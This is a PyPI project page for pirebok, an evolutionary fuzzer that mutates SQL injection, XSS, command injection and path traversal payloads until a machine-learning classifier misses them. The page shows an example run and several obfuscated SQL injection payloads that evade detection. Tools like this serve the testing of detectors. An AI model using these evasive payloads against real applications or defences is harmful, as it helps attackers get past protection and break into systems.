pîrebok (from Kurdish "witch") - a guided adversarial fuzzer with evolutionary search
- Documentation: https://happyhackingspace.github.io/pirebok
- GitHub: https://github.com/HappyHackingSpace/pirebok
- PyPI: https://pypi.org/project/pirebok/
- Free software: MIT
Features
- 4 attack types: SQL injection, XSS, command injection, path traversal
- Random and guided (evolutionary) fuzzers for each attack type
- Guided fuzzers use metamaska classifier to iteratively mutate payloads until they evade detection
- Priority-queue-based payload pool ranked by confidence
- Configurable
max_rounds,round_size, andtimeout
- 17 type-specific transformers + 6 generic transformers
How it works
Give it a payload. It mutates it until it bypasses the classifier.
pirebok -f GuidedRandomSqlFuzzer -p "admin' OR 1=1#" -s 5 -q
"admin' OR%001313<>1314#"
'admin\'/*%%0x9*/|| 1=1 || "iD" NOT LIKE "iD"#'
"ADmIn'/*>SQN*//**//*h[xI*/or/*p*//**/0X1=0X1#s<"
'AdMin\'\x0c|| "b"<>"bV"#;YR\x0b'
'aDMin\'||"Mce"%%231BF7%%0ALiKE%00"McE"#>wgpxX'
The original admin' OR 1=1# is classified as sqli with 100% confidence. After evolutionary mutations, the classifier misclassifies them as xss with confidence dropping to 0.48 - below the detection threshold.
| Confidence | Classification | Payload |
|---|---|---|
| 1.0000 | sqli | admin' OR 1=1# |
| 0.7808 | xss | admin'/*PCvp<a*/||%000x1=0x1#i> |
| 0.4785 | xss | ADmiN'%%0x39441%%0aOr/**/'Te'<>'TeD'#-HLa. |
Install
pip install pirebok
# for guided mode (requires metamaska)
pip install pirebok[guided]
Credits
Metadata
Release files for pirebok 0.2.1
For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.
Source distribution (sdist)
| File | Size | Uploaded | |
|---|---|---|---|
| pirebok-0.2.1.tar.gz | 29.1 kB | Details |
Built distribution (wheel)
| File | Interpreter | ABI | Platform | Reset |
|---|---|---|---|---|
| pirebok-0.2.1-py3-none-any.whl | Python 3 | none | any | Details |
Total release size: 79.6 kB
Release files / pirebok-0.2.1.tar.gz
| Download URL | pirebok-0.2.1.tar.gz |
|---|---|
| Size | 29.1 kB |
| Tags | Source |
|
SHA-256 checksum How to use checksums |
bc96e7a53030a896f01586d7802d434db15b95ba860f9e0f4439b83502ecebc6
|
|
BLAKE2b-256 checksum How to use checksums |
f6b5e478c17bc960e1fce52164e690bdb38809aadd053776a0f8c02f9b36c212
|
| Upload date | |
|
Uploaded using Trusted Publishing? What is trusted publishing? |
No |
| Uploaded via |
twine/6.1.0 CPython/3.13.7
|
Release files / pirebok-0.2.1-py3-none-any.whl
| Download URL | pirebok-0.2.1-py3-none-any.whl |
|---|---|
| Size | 50.5 kB |
| Tags | Python 3 |
|
SHA-256 checksum How to use checksums |
6e116fe57033711acfc4757fe6ea530f5adc3039dae7b7c8f99b133b82ebe230
|
|
BLAKE2b-256 checksum How to use checksums |
ddc915aaa90a7a05b37ef6fda24bb680490530744416cdaea8ab70b275bb7867
|
| Upload date | |
|
Uploaded using Trusted Publishing? What is trusted publishing? |
No |
| Uploaded via |
twine/6.1.0 CPython/3.13.7
|